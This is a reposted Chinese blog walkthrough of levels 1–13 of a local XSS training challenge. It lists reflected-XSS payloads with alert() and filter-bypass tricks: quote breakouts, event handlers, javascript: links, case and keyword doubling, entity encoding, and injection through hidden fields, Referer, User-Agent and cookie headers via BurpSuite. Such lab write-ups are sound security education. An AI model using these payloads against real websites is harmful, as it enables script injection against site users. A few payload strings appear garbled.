转-XSSchallenge（1-13题）

黑盒：xss挑战解题
第1题
第2题
第3题
第4题
第5题
第6题
第7题
第8题
第9题
第10题
第11题
第12题
第13题
第1题
我这里使用的是本地xsschallenge，你也可以玩在线版的，地址
1： 打开xsschallenge，发现长这样


2： 点击一下图片，来到了第一题
3： 把test替换为


<sCr<scrscRiptipt>ipt>OonN\&apos;\"<>
1
来进一步检查到底有哪些东西会被替换


会发现文本没有被过滤，那就直接上xss
4：再次修改test的内容为


<script>alert(/xss/)</script>
1
然后就通过第一关了
点击“确定”进入第2关




补充：一个作弊的方式，如何一口气通关所有关卡
在控制台输入javascript:alert(/xss/)




第2题
首先看到第二题长这个样子


1：先来万能模板试一把，把URL里的test替换为如下内容
URL里的内容


http://10.3.139.51/xsschallenge/level2.php?keyword=test
1
被替换的test的内容


<sCr<scrscRiptipt>ipt>OonN\&apos;\"<>
1
可以观察到传进去的内容没有被过滤，只是变成了value的值，那么手动修改payload，让value闭合就行了


2：构造payload


"><script>alert(/xss/)</script>
1
通关




第3题
来一个<script " 'Oonn>


“检查元素”发现内容点奇怪，查看页面源代码


发现左右尖括号被编码了，但是单引号没有被转码！
输入以下内容'onmouseover='alert(/xss/)
第一个单引号是闭合前面的单号，第二个单引号是为了闭合后面的单引号，构造出事件驱动，此时“查看页面源代码”


当你把鼠标放在搜索框中时，会出现弹窗




第4题




来一个<script " 'Oonn>
接着查看页面源代码


发现跟第3题没啥区别，把单引号换成双引号就OK
输入以下内容"onmouseover="alert(/xss/)
查看页面源代码


当你把鼠标放在搜索框时，nice




第5题




来一个<script " 'Oonn>
接着查看页面源代码


下面来改造一下测试代码<script script " 'Oonn>
发现跟上一步的结果差不多，仍然是大写变小写，关键字中间过滤（过滤一次），没有过滤单双引号


重新构造一下payload，使用伪协议的方式来构造xss


"><a href = "javascript:alert:alert(/xss/)">click me</a>
1
页面变成了这个样子


查看一下页面源代码


鼠标点击“click me”按钮，成功




第6题


来一个<script " 'Oonn>
接着查看页面源代码


发现没有做大小写过滤，没有过滤单双引号，只过滤了关键字
尝试第5题中的伪协议


"><a href = "javascript:alert:alert(/xss/)">click me</a>
1
发现“click me”按钮不是一个链接


查看页面源代码，发现href被过滤了


记得前面没有过滤大小写，修改一下payload


"><a hREf = "javascript:alert:alert(/xss/)">click me</a>
1
发现“click me”变成超链接了，有戏


鼠标点击一下，成功了


同样还是可以通过大小写策略，使用事件驱动方式触发xss


"Onmouseover="alert(/xss/)
1


综上，根据只要绕过大小写的策略，你可以写出如下payload




1. "> <Script>alert(/xss/)</script>
2. "> <img Src=666 OnError=alert(/xss/)>
3. "><a hREf = "javascript:alert:alert(/xss/)">click me</a>
4. "Onmouseover="alert(/xss/)
……
1
2
3
4
5
6
第7题


来一个<script " 'OOnn>
接着查看页面源代码


发现：
1：script被过滤了，on还剩一个，猜测只做一次关键字过滤
2：单双引号没有被过滤
那么复写关键字两次就行了，so easy
代码可以抄上一题的，复写两次就行，举个例子


"Oonnmouseover="alert(/xss/)
1




第8题


来一个<script " 'Oonn>
接着查看页面源代码


首先考虑伪协议尝试绕过


javascript:alert(/xss/)
1
当鼠标放在“友情链接”上时，发现左下角的URL不对劲


问题不大，对标签页属性进行16进制ASCII编码，再次尝试绕过


java&#x73;cript:alert(/xss/)
1
当鼠标放在“友情链接”上时，左下角显示正常


成功过关




第9题


既然仍然是友情链接，先尝试上一题的答案


java&#x73;cript:alert(/xss/)
1
结果被提示链接不合法


那我就先写一个正确的链接
左下角果然提示正常


猜测一下，把payload里面的弹窗改为百度


java&#x73;cript:alert('http://baidu.com')
1
左下角貌似正常


顺利通过




第10题


把URL栏里面的keyword替换为<script " 'Oonn>


接着查看页面源代码：


发现，除了我们输进去的代码被二次编码了以外，页面中还有三个隐藏的元素，并且隐藏的元素的值为空。那么首先考虑能不能搞一下这三个元素，方式是通过手动传参。于是URL栏里的地址尝试下面的三个


10.3.139.102/xsschallenge/level10.php?t_link=1
10.3.139.102/xsschallenge/level10.php?t_history=1
10.3.139.102/xsschallenge/level10.php?t_sort=1
1
2
3
最终发现，只有第三个URL能够赋值，接着再次把第三条URL修改


10.3.139.102/xsschallenge/level10.php?t_sort=<script " 'Oonn>
1
查看页面源代码，如下


有戏，接下来就是填字游戏了
【如果直接复制下面代码执行失败，请尝试手动写入】


10.3.139.102/xsschallenge/level10.php?t_sort=click me!" type="button" οnclick="alert(/xss/)
1
再来看一下页面源代码，不错，高度和谐


点一下“click me”按钮，顺利过关




第11题


把URL栏里面的keyword替换为<script " 'Oonn>
接着查看一下页面源代码，发现跟第10题相似，那就先按照第10题的思路试试


那么隐藏元素走一波


10.3.139.102/xsschallenge/level11.php?t_link=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_history=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_sort=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_ref=<script " 'Oonn>
1
2
3
4
发现第三条有结果


那么再玩一次填字游戏，尝试第3题的思路


10.3.139.102/xsschallenge/level11.php?t_sort="οnmοuseοver='alert(/xss/)'"
1
查看页面源代码，又凉了


那么再回过头来搞搞"t_ref"字段，其实查一下文件源代码发现那四行隐藏元素的内容是这样写的：


<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
1
2
3
4
所以可以放弃第三行了，使用Hackbar搞一下第四行


查看页面源代码，有戏，跟第10题的套路一样了，那么可以直接拿第10题的答案来套


修改一下Referer字段，然后就过关了。






第12题


先来查看一下页面源代码


看到第20行写有浏览器的指纹，啥也别说了，先搞第20行




首先按F12召唤“查看元素”，然后刷新页面，就会看到网络数据，当你用鼠标选中第一条数据时，右边会显示出详细通信内容，点击一下“重发”按钮，就能重新编辑数据包了


把指纹部分改成测试代码<script " 'Oonn>


发送完数据之后，来查看一下页面源代码，发现还是那个样，显示的还是指纹信息


那就接着使用“查看元素“吧，有戏。


使用上一题的答案click me!" type="button"font-size: 18px;">

看起来是成功了，但是为什么页面没有按钮呢？？？


再来看看”检查元素”，payload设置正常


看一下“预览”，点击按钮无果




此路不行，另觅他法，不就是改包嘛！！！


走BurpSuite代理，BurpSuite开启截断，然后“Forward“，顺利出现按钮，点一下，过关




第13题


首先查看一下页面源代码


猜测，第20行应该是cookie，应该是从它下手，根据上一题的惨痛教训，这次直接使用BurpSuite。劫持会话更改cookie




————————————————
版权声明：本文为CSDN博主「lainwith」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_44288604/article/details/107848620